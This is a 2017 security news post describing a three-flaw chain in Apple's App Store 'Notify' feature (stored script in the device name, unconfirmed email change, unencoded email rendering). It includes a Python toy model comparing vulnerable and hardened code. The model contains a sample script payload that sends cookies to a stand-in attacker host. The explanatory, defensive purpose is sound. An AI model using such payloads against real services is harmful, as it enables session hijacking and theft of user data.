January 24, 2017 by

Hacker Finds Glaring Vulnerabilities in Apple’s Notification Feature

Apple has pulled back and disabled a new notification feature entirely after a security researcher found that it contained multiple significant vulnerabilities.

Apple introduced a “Notify” button for iPhone and iPad users in November 2016. It lets a user ask to be alerted when a pre-announced game or application becomes available on the App Store. The feature was popular for obvious reasons, but security researcher Benjamin Kunz Mejri of Vulnerability Lab discovered multiple flaws in it.

An excerpt from the description of the vulnerability, as described by the researcher reads:

An application-side input validation web vulnerability has been discovered in the official Apple – App Store and iTunes Store online-service web-application. The vulnerability allows remote attackers to inject their own malicious script code on the application-side of the vulnerable context function or service module.

Fundamentally, successful exploitation could lead to persistent phishing attacks, complete session hijacking, and persistent manipulation of the affected services or of connected service-module context. The exploit could even lead to a persistent redirect to external sources.

The Exploit

The attack chains multiple vulnerabilities in the iTunes application and the App Store’s iOS ‘Notify’ function. When a user taps Notify to enable alerts for an unreleased app or game, the service automatically retrieves personal information from the device: the primary iCloud email address and the devicename value. The devicename parameter is not validated, which is a persistent (stored) input validation flaw: an attacker can set a malicious JavaScript payload as the device name and have the service store it. Wherever that stored value is later rendered without encoding, the payload executes.

The second vulnerability is that a remote attacker can set the victim’s iCloud email address as the primary email address on the attacker’s own account, without any approval or confirmation from the victim. As a result, whenever the unreleased app becomes available, Apple sends the notification email by default to the victim’s address, now bound to the attacker’s account, and that email carries the malicious payload the attacker inserted as the device name.

The third and final flaw is that Apple’s email client does not filter or encode the content of that email, so the device-name payload is rendered as-is and executes on the victim’s end.
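The three-step chain above, modelled as an added example (hypothetical code written for this page, not Apple’s implementation and not from Vulnerability Lab’s advisory). A toy Notify service stores the device name and interpolates it raw into the release email, and lets an account’s primary address be changed with no confirmation step; beside each is the hardened form (HTML-encode every untrusted value at the point of output, and require a single-use confirmation token before an address change takes effect). The names `NotifyAccount`, `render_notify_email_*`, `run_chain` and the sample payload are all assumptions.

```python
"""Toy model of the Notify chain (hypothetical, not Apple's code).

Flaw 1: the stored device name is interpolated raw into the HTML e-mail.
Flaw 2: the account's primary address can be changed with no confirmation.
Flaw 3 (the mail client rendering the payload) is modelled only as
"the body reaches the recipient with a live script tag in it".
"""
import html
import secrets
from typing import Callable, Dict, Tuple

# Constructed sample payload an attacker would set as their device name.
ATTACKER_DEVICE_NAME = (
    '<script>location="https://attacker.example/?c="+document.cookie</script>'
)


def render_notify_email_vulnerable(app_name: str, device_name: str) -> str:
    """Builds the HTML body with the stored device name inserted verbatim (flaw 1)."""
    return (
        f"<p>{app_name} is now available on the App Store.</p>"
        f"<p>Requested from: {device_name}</p>"
    )


def render_notify_email_hardened(app_name: str, device_name: str) -> str:
    """Same body, but every untrusted value is HTML-encoded at the point of output."""
    return (
        f"<p>{html.escape(app_name)} is now available on the App Store.</p>"
        f"<p>Requested from: {html.escape(device_name)}</p>"
    )


def contains_active_markup(body: str) -> bool:
    """Crude check used here to show whether a body still carries a live script."""
    lowered = body.lower()
    return "<script" in lowered or "javascript:" in lowered


class NotifyAccount:
    """Hypothetical account record holding the address release mails go to."""

    def __init__(self, primary_email: str) -> None:
        self.primary_email = primary_email
        self._pending: Dict[str, str] = {}  # confirmation token -> proposed address

    def change_email_unverified(self, new_email: str) -> None:
        # Flaw 2: the caller binds any address to this account, no questions asked.
        self.primary_email = new_email

    def request_email_change(self, new_email: str) -> str:
        """Hardened: record the proposal and return a single-use token.

        A real service would mail the token to new_email, so only whoever
        controls that mailbox can complete the change.
        """
        token = secrets.token_urlsafe(32)
        self._pending[token] = new_email
        return token

    def confirm_email_change(self, token: str) -> bool:
        """Applies the change only for a known token, and burns the token."""
        new_email = self._pending.pop(token, None)
        if new_email is None:
            return False
        self.primary_email = new_email
        return True


def release_notification(account: NotifyAccount, app_name: str, device_name: str,
                         render: Callable[[str, str], str]) -> Tuple[str, str]:
    """Models 'the app became available': returns (recipient, html body)."""
    return account.primary_email, render(app_name, device_name)


def run_chain(hardened: bool) -> Tuple[str, str]:
    """Plays the whole chain; returns (recipient, body) for either service variant."""
    attacker = NotifyAccount("attacker@example.com")
    if hardened:
        # The token goes to the victim's mailbox; the attacker never sees it,
        # so the primary address stays the attacker's own.
        attacker.request_email_change("victim@example.com")
        render = render_notify_email_hardened
    else:
        attacker.change_email_unverified("victim@example.com")
        render = render_notify_email_vulnerable
    return release_notification(attacker, "SomeGame", ATTACKER_DEVICE_NAME, render)


if __name__ == "__main__":
    for mode in (False, True):
        recipient, body = run_chain(hardened=mode)
        label = "hardened" if mode else "vulnerable"
        print(f"{label}: mail to {recipient}, live script: {contains_active_markup(body)}")
```

In the vulnerable variant the release mail goes to the victim and carries the script tag intact; in the hardened variant the address never changes without the token, and even a confirmed change would only deliver an encoded device name. Output encoding, not input filtering, is the fix for flaw 1, since the same stored value may be rendered in several contexts.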

Apple has been notified of the issue and is currently working toward a fix.

Image credit: Pexels.

About the author


LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients’ engagement experience while providing a strategic and integrated array of services to minimize risk and disruption while protecting your brand.
